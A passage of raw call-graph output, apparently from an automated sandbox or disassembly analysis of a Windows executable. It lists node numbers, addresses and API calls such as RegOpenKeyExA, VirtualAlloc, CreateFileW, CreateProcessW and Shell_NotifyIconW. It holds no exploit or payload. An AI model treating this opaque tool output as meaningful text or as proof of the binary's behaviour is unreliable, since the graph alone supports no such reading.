14b6073 RegCloseKey 116304->116305 116306 14b6034 116304->116306 116305->116251 116307 14b604d RegQueryValueExA 116306->116307 116307->116305 116308 14b605b 116307->116308 116308->116305 116309->116256 116311 14a0579 116310->116311 116312 14a0555 116310->116312 116311->116269 116325 149ef0d 116312->116325 116316 149ef42 116315->116316 116318 149ef55 116315->116318 116316->116318 116330 149f015 11 API calls 116316->116330 116318->116271 116320 14a0a66 116319->116320 116324 14a0a96 116319->116324 116322 14a0551 11 API calls 116320->116322 116323 14a0a72 116320->116323 116321 14a048d 11 API calls 116321->116323 116322->116324 116323->116274 116324->116321 116326 149ef2d 116325->116326 116327 149ef15 116325->116327 116326->116269 116327->116326 116329 149f015 11 API calls 116327->116329 116329->116326 116330->116318 116333 14b3c2d 116331->116333 116332 14a048d 11 API calls 116335 14b3d37 116332->116335 116333->116332 116336 14a0731 11 API calls 116335->116336 116337 14b3d5b 116335->116337 116340 14a0675 116335->116340 116336->116335 116338 14a048d 11 API calls 116337->116338 116339 14b3d70 116338->116339 116339->116279 116343 14a057d 116340->116343 116344 14a0551 11 API calls 116343->116344 116345 14a058d 116344->116345 116346 14a048d 11 API calls 116345->116346 116347 14a05a5 116346->116347 116347->116335 116349 14b4945 116348->116349 116365 14b47b5 116349->116365 116366 14b47dd 116365->116366 116700 14a01cc 116699->116700 116701 14a0196 116699->116701 116700->115714 116701->116700 116704 14a1741 116701->116704 116708 14a22a1 116701->116708 116705 14a176d 116704->116705 116706 14a1751 GetModuleFileNameA 116704->116706 116705->116701 116714 14a19d5 GetModuleFileNameA RegOpenKeyExA 116706->116714 116709 14a22e3 116708->116709 116710 14a22b2 116708->116710 116709->116701 116710->116709 116733 14a1789 116710->116733 116713 14a057d 11 API calls 116713->116709 116715 14a1a57 116714->116715 116716 14a1a17 RegOpenKeyExA 116714->116716 116732 14a17fd 12 API calls 116715->116732 116716->116715 116717 14a1a35 RegOpenKeyExA 116716->116717 116717->116715 116719 14a1ae0 lstrcpyn GetThreadLocale GetLocaleInfoA 116717->116719 116723 14a1c10 116719->116723 116724 14a1b17 116719->116724 116720 14a1a7c RegQueryValueExA 116721 14a1abe RegCloseKey 116720->116721 116722 14a1a9c RegQueryValueExA 116720->116722 116721->116705 116722->116721 116725 14a1aba 116722->116725 116723->116705 116724->116723 116726 14a1b27 lstrlen 116724->116726 116725->116721 116727 14a1b40 116726->116727 116727->116723 116728 14a1b9a 116727->116728 116729 14a1b6e lstrcpyn LoadLibraryExA 116727->116729 116728->116723 116730 14a1ba4 lstrcpyn LoadLibraryExA 116728->116730 116729->116728 116730->116723 116731 14a1bda lstrcpyn LoadLibraryExA 116730->116731 116731->116723 116732->116720 116734 14a179d 116733->116734 116735 14a17b9 LoadStringA 116733->116735 116734->116735 116736 14a1741 30 API calls 116734->116736 116735->116713 116736->116735 116737->115834 116742->115827 116743->115839 116744->115915 116749->115908 116750->115920 114561 708232 114566 707fee 114561->114566 114564 70825a 114567 70801f try_get_first_available_module 114566->114567 114577 708168 114567->114577 114581 6f8d2b 39 API calls 2 library calls 114567->114581 114569 70821e 114585 702610 25 API calls _strftime 114569->114585 114571 708173 114571->114564 114578 7108ae 114571->114578 114573 7081bc 114573->114577 114582 6f8d2b 39 API calls 2 library calls 114573->114582 114575 7081db 114575->114577 114583 6f8d2b 39 API calls 2 library calls 114575->114583 114577->114571 114584 7026cc 19 API calls _abort 114577->114584 114586 70ffab 114578->114586 114580 7108c9 114580->114564 114581->114573 114582->114575 114583->114577 114584->114569 114585->114571 114587 70ffb7 ___scrt_is_nonwritable_in_current_image 114586->114587 114588 70ffc5 114587->114588 114591 70fffe 114587->114591 114643 7026cc 19 API calls _abort 114588->114643 114590 70ffca 114644 702610 25 API calls _strftime 114590->114644 114597 710585 114591->114597 114596 70ffd4 ___scrt_is_nonwritable_in_current_image 114596->114580 114598 7105a2 114597->114598 114599 7105d0 114598->114599 114600 7105b7 114598->114600 114646 70504f 114599->114646 114660 7026b9 19 API calls _abort 114600->114660 114603 7105d5 114604 7105f5 114603->114604 114605 7105de 114603->114605 114659 7102c4 CreateFileW 114604->114659 114662 7026b9 19 API calls _abort 114605->114662 114609 7105e3 114663 7026cc 19 API calls _abort 114609->114663 114611 7106ab GetFileType 114612 7106b6 GetLastError 114611->114612 114617 7106fd 114611->114617 114666 702696 19 API calls __dosmaperr 114612->114666 114613 710680 GetLastError 114665 702696 19 API calls __dosmaperr 114613->114665 114614 71062e 114614->114611 114614->114613 114664 7102c4 CreateFileW 114614->114664 114668 704f98 20 API calls 2 library calls 114617->114668 114619 7105bc 114661 7026cc 19 API calls _abort 114619->114661 114620 7106c4 CloseHandle 114620->114619 114623 7106ed 114620->114623 114622 710673 114622->114611 114622->114613 114667 7026cc 19 API calls _abort 114623->114667 114624 71071e 114626 71076a 114624->114626 114669 7104d5 71 API calls 3 library calls 114624->114669 114631 710797 114626->114631 114670 710077 71 API calls 4 library calls 114626->114670 114627 7106f2 114627->114619 114630 710790 114630->114631 114632 7107a8 114630->114632 114671 7084de 114631->114671 114634 710022 114632->114634 114635 710826 CloseHandle 114632->114635 114645 71004b LeaveCriticalSection __wsopen_s 114634->114645 114686 7102c4 CreateFileW 114635->114686 114637 710851 114638 71085b GetLastError 114637->114638 114639 710887 114637->114639 114687 702696 19 API calls __dosmaperr 114638->114687 114639->114634 114641 710867 114688 705161 20 API calls 2 library calls 114641->114688 114643->114590 114644->114596 114645->114596 114647 70505b ___scrt_is_nonwritable_in_current_image 114646->114647 114689 702e35 EnterCriticalSection 114647->114689 114649 705062 114650 705087 114649->114650 114655 7050f5 EnterCriticalSection 114649->114655 114657 7050a9 114649->114657 114693 704e2c 20 API calls 3 library calls 114650->114693 114653 7050d2 ___scrt_is_nonwritable_in_current_image 114653->114603 114654 70508c 114654->114657 114694 704f73 EnterCriticalSection 114654->114694 114656 705102 LeaveCriticalSection 114655->114656 114655->114657 114656->114649 114690 705158 114657->114690 114659->114614 114660->114619 114661->114634 114662->114609 114663->114619 114664->114622 114665->114619 114666->114620 114667->114627 114668->114624 114669->114626 114670->114630 114696 7051f2 114671->114696 114673 7084f4 114709 705161 20 API calls 2 library calls 114673->114709 114675 7084ee 114675->114673 114676 708526 114675->114676 114679 7051f2 __wsopen_s 25 API calls 114675->114679 114676->114673 114677 7051f2 __wsopen_s 25 API calls 114676->114677 114680 708532 CloseHandle 114677->114680 114678 70854c 114681 70856e 114678->114681 114710 702696 19 API calls __dosmaperr 114678->114710 114682 70851d 114679->114682 114680->114673 114683 70853e GetLastError 114680->114683 114681->114634 114685 7051f2 __wsopen_s 25 API calls 114682->114685 114683->114673 114685->114676 114686->114637 114687->114641 114688->114639 114689->114649 114695 702e7d LeaveCriticalSection 114690->114695 114692 70515f 114692->114653 114693->114654 114694->114657 114695->114692 114697 705214 114696->114697 114698 7051ff 114696->114698 114703 705239 114697->114703 114713 7026b9 19 API calls _abort 114697->114713 114711 7026b9 19 API calls _abort 114698->114711 114700 705204 114712 7026cc 19 API calls _abort 114700->114712 114703->114675 114704 705244 114714 7026cc 19 API calls _abort 114704->114714 114705 70520c 114705->114675 114707 70524c 114715 702610 25 API calls _strftime 114707->114715 114709->114678 114710->114681 114711->114700 114712->114705 114713->114704 114714->114707 114715->114705 116751 713e53 116752 713e5d 116751->116752 116754 6d381e messages 116751->116754 116783 6d29d0 21 API calls messages 116752->116783 116761 6d38bc 116754->116761 116784 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116754->116784 116755 6d3e3d 116787 744358 79 API calls __wsopen_s 116755->116787 116758 713fc6 116759 6df38f 21 API calls 116758->116759 116758->116761 116760 713fe0 116759->116760 116785 6f06d4 28 API calls __onexit 116760->116785 116761->116755 116767 6d3af2 116761->116767 116780 6d37bc messages 116761->116780 116762 7142b9 116788 744358 79 API calls __wsopen_s 116762->116788 116765 714310 116766 713fea 116786 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116766->116786 116767->116762 116769 6d3713 116767->116769 116770 6d376c 116769->116770 116774 6d3c35 messages 116769->116774 116771 7143c4 116770->116771 116781 6d37a6 messages 116770->116781 116789 744358 79 API calls __wsopen_s 116771->116789 116772 6d415b 116776 6f042b 21 API calls 116772->116776 116773 6d4887 116778 713cef 116773->116778 116773->116780 116773->116781 116774->116772 116774->116773 116774->116781 116776->116781 116777 7143d3 116779 6dfbc8 21 API calls 116778->116779 116778->116780 116779->116780 116781->116780 116782 6dfbc8 21 API calls 116781->116782 116782->116781 116783->116754 116784->116758 116785->116766 116786->116761 116787->116762 116788->116765 116789->116777 114716 6e3aa8 GetForegroundWindow 114717 6e4e5a GetWindowLongW 114716->114717 114719 6e3abc 114717->114719 114718 6e3ad5 114719->114718 114720 6e4b74 26 API calls 114719->114720 114720->114718 116790 6d7dcb 116791 6d7dcf 116790->116791 116792 6d7dd7 116790->116792 116796 6d7070 116791->116796 116870 6d651c 79 API calls 116792->116870 116795 6d7dec 116797 6d70e9 116796->116797 116827 6d7509 116796->116827 116798 6d74f3 116797->116798 116799 6d710c 116797->116799 116882 6d2236 39 API calls 116798->116882 116799->116827 116871 6d1ed0 116799->116871 116803 7175a2 116803->116792 116804 6d7490 116806 6d1d83 39 API calls 116804->116806 116805 6d334c 38 API calls 116811 6d7368 116805->116811 116810 6d7308 116806->116810 116808 6d7127 116808->116804 116808->116810 116812 6d7176 116808->116812 116808->116827 116853 6d740b 116808->116853 116883 730202 79 API calls 116808->116883 116884 6d6394 90 API calls 116808->116884 116810->116805 116818 717465 116811->116818 116822 6d737e 116811->116822 116825 717507 116811->116825 116811->116853 116813 71720c 116812->116813 116814 717279 116812->116814 116812->116827 116828 6d7187 116812->116828 116833 71721e 116812->116833 116812->116853 116889 6d3574 21 API calls 116813->116889 116817 7172b6 116814->116817 116814->116828 116887 73c409 21 API calls 116814->116887 116816 717505 116901 6d1caa 21 API calls 116816->116901 116823 6d32c3 21 API calls 116817->116823 116896 755123 77 API calls ___scrt_fastfail 116818->116896 116820 6dfbc8 21 API calls 116840 6d71ba 116820->116840 116822->116816 116822->116825 116880 6d236b 53 API calls 116822->116880 116823->116828 116899 7562ca 21 API calls 116825->116899 116826 717274 116888 6d3574 21 API calls 116826->116888 116902 744358 79 API calls __wsopen_s 116827->116902 116828->116820 116828->116827 116828->116840 116828->116853 116831 6d73c3 116831->116825 116835 717532 116831->116835 116881 6d236b 53 API calls 116831->116881 116832 7174a2 116841 7174f0 116832->116841 116842 7174b0 116832->116842 116833->116817 116885 6d2510 21 API calls 116833->116885 116900 6d236b 53 API calls 116835->116900 116837 717263 116837->116817 116886 6d2510 21 API calls 116837->116886 116840->116827 116852 6d7232 116840->116852 116840->116853 116890 6d3574 21 API calls 116840->116890 116897 6d3574 21 API calls 116841->116897 116843 6d32c3 21 API calls 116842->116843 116843->116853 116845 6d73df 116845->116816 116845->116825 116849 6d7404 116845->116849 116847 7174f9 116898 6d3574 21 API calls 116847->116898 116851 6f042b 21 API calls 116849->116851 116851->116853 116856 7173c1 116852->116856 116857 6d7272 116852->116857 116853->116792 116854 7173de 116893 6d2c6f 38 API calls 116854->116893 116855 7173d4 116892 6d2be0 38 API calls 116855->116892 116856->116855 116891 6d2c6f 38 API calls 116856->116891 116857->116804 116857->116827 116857->116854 116861 6d72ae 116857->116861 116861->116854 116862 6d72c5 116861->116862 116864 6d72ca 116861->116864 116879 6d2be0 38 API calls 116862->116879 116865 6d72f4 116864->116865 116866 717421 116864->116866 116865->116810 116865->116827 116867 717435 116866->116867 116894 6d2c6f 38 API calls 116866->116894 116895 6d2be0 38 API calls 116867->116895 116870->116795 116872 6d2117 116871->116872 116876 6d1ee3 116871->116876 116872->116808 116874 6df38f 21 API calls 116874->116876 116875 6d1f8d 116875->116808 116876->116874 116876->116875 116903 6f0854 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 116876->116903 116904 6f06d4 28 API calls __onexit 116876->116904 116905 6f080a EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 116876->116905 116879->116864 116880->116831 116881->116845 116882->116827 116883->116808 116884->116808 116885->116837 116886->116826 116887->116826 116888->116813 116889->116817 116890->116852 116891->116855 116892->116854 116893->116864 116894->116867 116895->116827 116896->116832 116897->116847 116898->116816 116899->116835 116900->116816 116901->116853 116902->116803 116903->116876 116904->116876 116905->116876 114721 149ee41 114722 149ee69 114721->114722 114723 149ee56 114721->114723 114725 149ee8a 114722->114725 114726 149ee80 RtlEnterCriticalSection 114722->114726 114750 149e05d RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 114723->114750 114737 149ec3d 13 API calls 114725->114737 114726->114725 114728 149ee5b 114728->114722 114730 149ee5f 114728->114730 114729 149ee93 114731 149ee97 114729->114731 114738 149e8b9 114729->114738 114733 149eef9 114731->114733 114734 149eeef RtlLeaveCriticalSection 114731->114734 114734->114733 114735 149eea3 114735->114731 114751 149ea65 9 API calls 114735->114751 114737->114729 114739 149e8cb 114738->114739 114740 149e8d4 114738->114740 114758 149e05d RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 114739->114758 114743 149e8fd RtlEnterCriticalSection 114740->114743 114744 149e907 114740->114744 114749 149e8dc 114740->114749 114742 149e8d0 114742->114740 114742->114749 114743->114744 114744->114749 114752 149e771 114744->114752 114747 149ea4a RtlLeaveCriticalSection 114748 149ea54 114747->114748 114748->114735 114749->114735 114750->114728 114751->114731 114755 149e788 114752->114755 114753 149e7c9 114757 149e7f0 114753->114757 114764 149e509 114753->114764 114755->114753 114755->114757 114759 149e6d9 114755->114759 114757->114747 114757->114748 114758->114742 114768 149dddd 114759->114768 114761 149e6e9 114762 149e6f6 114761->114762 114777 149e64d 9 API calls 114761->114777 114762->114755 114765 149e5a4 114764->114765 114766 149e52e 114764->114766 114765->114766 114796 149e44d 114765->114796 114766->114757 114772 149ddfb 114768->114772 114769 149de09 114778 149dc61 114769->114778 114772->114769 114774 149de69 114772->114774 114775 149de17 114772->114775 114782 149dabd 114772->114782 114790 149d971 LocalAlloc 114772->114790 114791 149db99 114774->114791 114775->114761 114777->114762 114780 149dcb4 114778->114780 114779 149dd03 114779->114775 114780->114779 114781 149dcea VirtualAlloc 114780->114781 114781->114779 114781->114780 114783 149dacc VirtualAlloc 114782->114783 114785 149daf9 114783->114785 114786 149db1c 114783->114786 114795 149d8e1 LocalAlloc 114785->114795 114786->114772 114788 149db05 114788->114786 114789 149db09 VirtualFree 114788->114789 114789->114786 114790->114772 114793 149dbc7 114791->114793 114792 149dc3b 114792->114775 114793->114792 114794 149dc05 VirtualFree 114793->114794 114794->114793 114795->114788 114797 149e461 114796->114797 114798 149e4fd 114797->114798 114799 149e499 114797->114799 114800 149e4af 114797->114800 114798->114766 114809 149dfc9 114799->114809 114802 149dfc9 3 API calls 114800->114802 114803 149e4ad 114802->114803 114803->114798 114819 149e30d 9 API calls 114803->114819 114805 149e4d0 114806 149e4f2 114805->114806 114820 149e36d 9 API calls 114805->114820 114821 149d9f9 LocalAlloc 114806->114821 114810 149dff3 114809->114810 114818 149e050 114809->114818 114822 149dd21 114810->114822 114814 149e02b 114814->114818 114827 149d9f9 LocalAlloc 114814->114827 114815 149e014 114815->114814 114816 149db99 VirtualFree 114815->114816 114816->114814 114818->114803 114819->114805 114820->114806 114821->114798 114824 149dd72 114822->114824 114823 149ddd3 114826 149d971 LocalAlloc 114823->114826 114824->114823 114825 149dda4 VirtualFree 114824->114825 114825->114824 114826->114815 114827->114818 116906 7195d9 116907 7195e7 116906->116907 116909 6d9d61 messages 116906->116909 116908 6d9dfc messages 116910 6d9e13 116908->116910 116913 6d24c6 21 API calls messages 116908->116913 116909->116908 116911 6d1dd1 21 API calls 116909->116911 116911->116908 116913->116908 116914 6d1044 116919 6d921a 116914->116919 116956 6ef70a 116919->116956 116923 6d9291 116924 6df38f 21 API calls 116923->116924 116925 6d929b 116924->116925 116926 6df38f 21 API calls 116925->116926 116927 6d92a5 116926->116927 116928 6df38f 21 API calls 116927->116928 116929 6d92af 116928->116929 116930 6df38f 21 API calls 116929->116930 116931 6d92ed 116930->116931 116932 6df38f 21 API calls 116931->116932 116933 6d93b9 116932->116933 116966 6efb30 116933->116966 117002 6ef7cf 116956->117002 116959 6ef7cf 21 API calls 116960 6ef742 116959->116960 116961 6df38f 21 API calls 116960->116961 116962 6ef74e 116961->116962 116963 6df82c 21 API calls 116962->116963 116964 6d9250 116963->116964 116965 6ef9fb 6 API calls 116964->116965 116965->116923 116967 6df38f 21 API calls 116966->116967 116968 6efb40 116967->116968 116969 6df38f 21 API calls 116968->116969 116970 6efb48 116969->116970 117009 6df2ae 116970->117009 116973 6df2ae 21 API calls 116974 6efb58 116973->116974 116975 6df38f 21 API calls 116974->116975 116976 6efb63 116975->116976 116977 6f042b 21 API calls 116976->116977 116978 6d93c3 116977->116978 116979 6ef508 116978->116979 116980 6ef516 116979->116980 116981 6df38f 21 API calls 116980->116981 116982 6ef521 116981->116982 116983 6df38f 21 API calls 116982->116983 116984 6ef52c 116983->116984 117003 6df38f 21 API calls 117002->117003 117004 6ef7da 117003->117004 117005 6df38f 21 API calls 117004->117005 117006 6ef7e2 117005->117006 117007 6df38f 21 API calls 117006->117007 117008 6ef738 117007->117008 117008->116959 117010 6df38f 21 API calls 117009->117010 117011 6df2b6 117010->117011 117011->116973 114828 6e397e 114831 6e3998 114828->114831 114832 6e39af 114831->114832 114833 6e39b4 114832->114833 114834 6e3a13 114832->114834 114875 6e3a11 114832->114875 114835 6e3a8d PostQuitMessage 114833->114835 114836 6e39c1 114833->114836 114838 7280b1 114834->114838 114839 6e3a19 114834->114839 114871 6e3992 114835->114871 114840 6e39cc 114836->114840 114841 72811e 114836->114841 114837 6e39f8 DefWindowProcW 114837->114871 114887 6dad2c 10 API calls 114838->114887 114843 6e3a45 SetTimer RegisterWindowMessageW 114839->114843 114844 6e3a20 114839->114844 114845 6e39d6 114840->114845 114846 6e3a97 114840->114846 114892 73cde4 65 API calls ___scrt_fastfail 114841->114892 114847 6e3a6e CreatePopupMenu 114843->114847 114843->114871 114850 728052 114844->114850 114851 6e3a29 KillTimer 114844->114851 114853 728103 114845->114853 114854 6e39e1 114845->114854 114876 6e3619 114846->114876 114847->114871 114849 7280d2 114888 6dad46 40 API calls 114849->114888 114858 728057 114850->114858 114859 72808d MoveWindow 114850->114859 114883 6e35b3 Shell_NotifyIconW ___scrt_fastfail 114851->114883 114853->114837 114891 731bdd 21 API calls 114853->114891 114861 6e3a7b 114854->114861 114870 6e39ec 114854->114870 114855 728130 114855->114837 114855->114871 114862 72807c SetFocus 114858->114862 114863 72805d 114858->114863 114859->114871 114860 6e3a3c 114884 6e514d DeleteObject DestroyWindow 114860->114884 114885 6e36c0 75 API calls ___scrt_fastfail 114861->114885 114862->114871 114864 728066 114863->114864 114863->114870 114886 6dad2c 10 API calls 114864->114886 114869 6e3a8b 114869->114871 114870->114837 114889 6e35b3 Shell_NotifyIconW ___scrt_fastfail 114870->114889 114873 7280f7 114890 6e34c7 60 API calls ___scrt_fastfail 114873->114890 114875->114837 114877 6e36b7 114876->114877 114878 6e3631 ___scrt_fastfail 114876->114878 114877->114871 114893 6e37b5 114878->114893 114880 6e36a0 KillTimer SetTimer 114880->114877 114881 6e3658 114881->114880 114882 727d46 Shell_NotifyIconW 114881->114882 114882->114880 114883->114860 114884->114871 114885->114869 114886->114871 114887->114849 114888->114870 114889->114873 114890->114875 114891->114875 114892->114855 114894 6e37d2 114893->114894 114912 6e38b7 114893->114912 114895 6df6d1 21 API calls 114894->114895 114896 6e37e0 114895->114896 114897 6e37ed 114896->114897 114898 727f87 LoadStringW 114896->114898 114899 6df82c 21 API calls 114897->114899 114901 727fa1 114898->114901 114900 6e3802 114899->114900 114902 6e380f 114900->114902 114909 727fbd 114900->114909 114904 6dfbc8 21 API calls 114901->114904 114922 6e3835 ___scrt_fastfail 114901->114922 114902->114901 114903 6e3819 114902->114903 114923 6df91b 114903->114923 114904->114922 114908 728000 114935 6f016e 50 API calls 114908->114935 114909->114908 114911 6df38f 21 API calls 114909->114911 114909->114922 114910 6e389d Shell_NotifyIconW 114910->114912 114913 727fe7 114911->114913 114912->114881 114933 73a7a8 22 API calls 114913->114933 114916 727ff2 114934 6df78e 21 API calls 114916->114934 114917 72801f 114918 6df91b 21 API calls 114917->114918 114920 728030 114918->114920 114921 6df91b 21 API calls 114920->114921 114921->114922 114922->114910 114924 7262c2 114923->114924 114925 6df932 114923->114925 114927 6f042b 21 API calls 114924->114927 114936 6df8bc 114925->114936 114929 7262cc _wcslen 114927->114929 114928 6df93d 114932 6df78e 21 API calls 114928->114932 114930 6f045b 21 API calls 114929->114930 114931 726308 __fread_nolock 114930->114931 114932->114922 114933->114916 114934->114908 114935->114917 114937 6df8cc _wcslen 114936->114937 114938 6df8df 114937->114938 114939 726266 114937->114939 114946 6df7b3 114938->114946 114940 6f042b 21 API calls 114939->114940 114942 726270 114940->114942 114944 6f045b 21 API calls 114942->114944 114943 6df8ec __fread_nolock 114943->114928 114945 7262a3 __fread_nolock 114944->114945 114947 6df7cb 114946->114947 114950 6df7c4 __fread_nolock 114946->114950 114948 6f045b 21 API calls 114947->114948 114949 726214 114947->114949 114948->114950 114949->114949 114950->114943 117014 6feb9e 117015 6febaa ___scrt_is_nonwritable_in_current_image 117014->117015 117016 6febcb 117015->117016 117017 6febb6 117015->117017 117027 6f90a1 EnterCriticalSection 117016->117027 117033 7026cc 19 API calls _abort 117017->117033 117020 6febd7 117028 6fec0b 117020->117028 117021 6febbb 117034 702610 25 API calls _strftime 117021->117034 117026 6febc6 ___scrt_is_nonwritable_in_current_image 117027->117020 117036 6fec36 117028->117036 117030 6febe4 117035 6fec01 LeaveCriticalSection __fread_nolock 117030->117035 117031 6fec18 117031->117030 117056 7026cc 19 API calls _abort 117031->117056 117033->117021 117034->117026 117035->117026 117037 6fec5e 117036->117037 117038 6fec44 117036->117038 117040 6fd7f5 __fread_nolock 25 API calls 117037->117040 117060 7026cc 19 API calls _abort 117038->117060 117042 6fec67 117040->117042 117041 6fec49 117061 702610 25 API calls _strftime 117041->117061 117057 709239 117042->117057 117046 6fecef 117049 6fed0c 117046->117049 117055 6fed1e 117046->117055 117047 6fed6b 117048 6fed78 117047->117048 117047->117055 117063 7026cc 19 API calls _abort 117048->117063 117062 6fef4f 30 API calls 4 library calls 117049->117062 117052 6fed16 117053 6fec54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 117052->117053 117053->117031 117055->117053 117064 6fedcb 29 API calls 2 library calls 117055->117064 117056->117030 117065 7090b6 117057->117065 117059 6fec83 117059->117046 117059->117047 117059->117053 117060->117041 117061->117053 117062->117052 117063->117053 117064->117053 117066 7090c2 ___scrt_is_nonwritable_in_current_image 117065->117066 117067 7090ca 117066->117067 117069 7090e2 117066->117069 117091 7026b9 19 API calls _abort 117067->117091 117068 709196 117096 7026b9 19 API calls _abort 117068->117096 117069->117068 117075 70911a 117069->117075 117071 7090cf 117092 7026cc 19 API calls _abort 117071->117092 117074 70919b 117097 7026cc 19 API calls _abort 117074->117097 117090 704f73 EnterCriticalSection 117075->117090 117078 7091a3 117098 702610 25 API calls _strftime 117078->117098 117079 709120 117081 709144 117079->117081 117082 709159 117079->117082 117093 7026cc 19 API calls _abort 117081->117093 117085 7091bb __fread_nolock 27 API calls 117082->117085 117084 7090d7 ___scrt_is_nonwritable_in_current_image 117084->117059 117086 709154 117085->117086 117095 70918e LeaveCriticalSection __wsopen_s 117086->117095 117087 709149 117094 7026b9 19 API calls _abort 117087->117094 117090->117079 117091->117071 117092->117084 117093->117087 117094->117086 117095->117084 117096->117074 117097->117078 117098->117084 117099 14b2cbf LdrInitializeThunk 117100 713644 117111 6d1b4d 117100->117111 117102 71365a 117104 7136d3 117102->117104 117120 6d362b 22 API calls 117102->117120 117108 714248 117104->117108 117122 744358 79 API calls __wsopen_s 117104->117122 117106 7136b3 117106->117104 117121 742823 21 API calls 117106->117121 117123 744358 79 API calls __wsopen_s 117108->117123 117110 714310 117112 6d1b6e 117111->117112 117113 6d1b5b 117111->117113 117114 6d1ba1 117112->117114 117115 6d1b73 117112->117115 117124 6d3574 21 API calls 117113->117124 117125 6d3574 21 API calls 117114->117125 117117 6f042b 21 API calls 117115->117117 117119 6d1b65 117117->117119 117119->117102 117120->117106 117121->117104 117122->117108 117123->117110 117124->117119 117125->117119 117126 6d1098 117131 6e310d 117126->117131 117130 6d10a7 117132 6df38f 21 API calls 117131->117132 117133 6e3124 GetVersionExW 117132->117133 117134 6df82c 21 API calls 117133->117134 117135 6e3171 117134->117135 117136 6df9a0 21 API calls 117135->117136 117140 6e31a7 117135->117140 117137 6e319b 117136->117137 117152 6df433 117137->117152 117138 6e324c GetCurrentProcess IsWow64Process 117141 6e3268 117138->117141 117140->117138 117142 727c2f 117140->117142 117143 727c74 GetSystemInfo 117141->117143 117144 6e3280 LoadLibraryA 117141->117144 117145 6e32cf GetSystemInfo 117144->117145 117146 6e3291 GetProcAddress 117144->117146 117148 6e32a7 117145->117148 117146->117145 117147 6e32a1 GetNativeSystemInfo 117146->117147 117147->117148 117149 6e32ab FreeLibrary 117148->117149 117150 6d109d 117148->117150 117149->117150 117151 6f06d4 28 API calls __onexit 117150->117151 117151->117130 117153 6df441 117152->117153 117154 6df9a0 21 API calls 117153->117154 117155 6df455 117154->117155 117155->117140 114951 712fa7 114952 6f042b 21 API calls 114951->114952 114953 712fae 114952->114953 114954 6f045b 21 API calls 114953->114954 114957 712fc7 __fread_nolock 114953->114957 114954->114957 114955 6f045b 21 API calls 114956 712fec 114955->114956 114957->114955 117156 6d105b 117161 6e0e5b 117156->117161 117158 6d106a 117192 6f06d4 28 API calls __onexit 117158->117192 117160 6d1074 117162 6e0e6b __wsopen_s 117161->117162 117163 6df38f 21 API calls 117162->117163 117164 6e0f21 117163->117164 117193 6d1155 117164->117193 117166 6e0f2a 117200 6efd48 117166->117200 117169 6df91b 21 API calls 117170 6e0f43 117169->117170 117206 6e2608 117170->117206 117173 6df38f 21 API calls 117174 6e0f5b 117173->117174 117175 6df9fa 21 API calls 117174->117175 117176 6e0f64 RegOpenKeyExW 117175->117176 117177 726fd8 RegQueryValueExW 117176->117177 117181 6e0f86 117176->117181 117178 726ff5 117177->117178 117179 72706e RegCloseKey 117177->117179 117180 6f045b 21 API calls 117178->117180 117179->117181 117189 727080 _wcslen 117179->117189 117182 72700e 117180->117182 117181->117158 117212 6e2572 117182->117212 117183 6df6ad 21 API calls 117183->117189 117186 727036 117187 6df82c 21 API calls 117186->117187 117188 727050 messages 117187->117188 117188->117179 117189->117181 117189->117183 117190 6dfa3b 21 API calls 117189->117190 117191 6e2608 21 API calls 117189->117191 117190->117189 117191->117189 117192->117160 117215 711e50 117193->117215 117196 6dfa3b 21 API calls 117197 6d1188 117196->117197 117217 6d119f 117197->117217 117199 6d1192 117199->117166 117201 711e50 __wsopen_s 117200->117201 117202 6efd55 GetFullPathNameW 117201->117202 117203 6efd77 117202->117203 117204 6df82c 21 API calls 117203->117204 117205 6e0f35 117204->117205 117205->117169 117207 6e2617 117206->117207 117208 6e2638 __fread_nolock 117206->117208 117211 6f045b 21 API calls 117207->117211 117209 6f042b 21 API calls 117208->117209 117210 6e0f52 117209->117210 117210->117173 117211->117208 117213 6f042b 21 API calls 117212->117213 117214 6e2584 RegQueryValueExW 117213->117214 117214->117186 117214->117188 117216 6d1162 GetModuleFileNameW 117215->117216 117216->117196 117218 711e50 __wsopen_s 117217->117218 117219 6d11ac GetFullPathNameW 117218->117219 117220 6d11e8 117219->117220 117221 6d11cb 117219->117221 117222 6df9fa 21 API calls 117220->117222 117223 6df82c 21 API calls 117221->117223 117224 6d11d7 117222->117224 117223->117224 117225 6df433 21 API calls 117224->117225 117226 6d11e3 117225->117226 117226->117199 117227 6e3ad9 117228 6e4164 117227->117228 117229 6e4e5a GetWindowLongW 117228->117229 117233 6e4178 117229->117233 117230 6e419b 117234 6e41f6 117230->117234 117235 6e41a7 117230->117235 117231 6e426f DefDlgProcW 117238 6e41f1 117231->117238 117233->117230 117233->117231 117247 728447 117233->117247 117236 6e41ff 117234->117236 117237 6e4228 117234->117237 117239 6e432d 117235->117239 117245 6e42e8 117235->117245 117246 6e41b6 117235->117246 117241 7285c0 117236->117241 117242 6e4205 117236->117242 117243 7285a3 117237->117243 117244 6e4236 117237->117244 117332 76a8ca 41 API calls 117239->117332 117240 72849d 117240->117238 117307 7284ba 117240->117307 117308 7284db 117240->117308 117340 7694ed 110 API calls 117241->117340 117250 6e420e 117242->117250 117251 6e428a 117242->117251 117343 769495 28 API calls 117243->117343 117244->117241 117253 6e423f 117244->117253 117248 728577 117245->117248 117249 6e42f3 117245->117249 117254 6e41bc 117246->117254 117255 7284e8 117246->117255 117247->117240 117328 74c4ff 53 API calls _strftime 117247->117328 117338 769fb4 98 API calls 117248->117338 117264 6e42fc 117249->117264 117265 728565 117249->117265 117267 728584 117250->117267 117268 6e421c 117250->117268 117258 6e42ad 117251->117258 117251->117267 117288 6e42a3 117251->117288 117256 7285f0 117253->117256 117283 728623 117253->117283 117284 6e425a 117253->117284 117260 6e4349 117254->117260 117261 6e41c5 117254->117261 117331 769ad7 84 API calls 117255->117331 117274 72860b DefDlgProcW 117256->117274 117277 6e4e5a GetWindowLongW 117258->117277 117269 6e436d 117260->117269 117270 6e434b 117260->117270 117275 6e41ce 117261->117275 117276 6e4280 117261->117276 117279 6e4305 117264->117279 117280 72854f 117264->117280 117337 769e05 CreateProcessW CloseHandle DefDlgProcW 117265->117337 117271 72859a 117267->117271 117272 7285a9 117267->117272 